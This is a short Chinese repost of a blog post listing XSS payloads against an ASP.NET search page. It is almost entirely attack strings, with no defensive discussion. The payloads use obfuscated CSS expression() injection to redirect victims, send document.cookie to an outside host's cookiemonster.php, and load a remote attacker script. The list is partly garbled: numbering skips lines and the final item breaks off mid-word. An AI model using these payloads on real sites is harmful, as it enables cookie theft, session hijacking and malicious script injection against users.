Asp.net跨站脚本攻击XSS实例分享

上善若水



Asp.net跨站脚本攻击XSS实例分享

常用攻击代码：

1. http://target/vuln-search.aspx?term=
2. </XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
3. Redirection Attack
5. http://target/vuln-search.aspx?term=
6. </XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.xxx.com")>
7. Cookie stealing
9. http://target/vuln-search.aspx?term=
10. </XSS/*-*/STYLE=xss:e/**/xpression(window.location=
11. "http://www.xxx.com/cookiemonster.php?sid="%2bdocument.cookie)>
12. Unrestricted HTML injection from external '.js' file
14. http://target/vuln-search.aspx?term=
15. </XSS/*-*/STYLE=xss:expression(myScript=document.body.appendChild
16. (document.createElement("script")))>
18. </XSS/*-*/STYLE=xss:expression(myScript.setAttribute("src","http://attackerserver/xss.js"))>
19. where 'xss.js&

复制代码

来源：https://blog.csdn.net/yangzhenping/article/details/49024615
免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！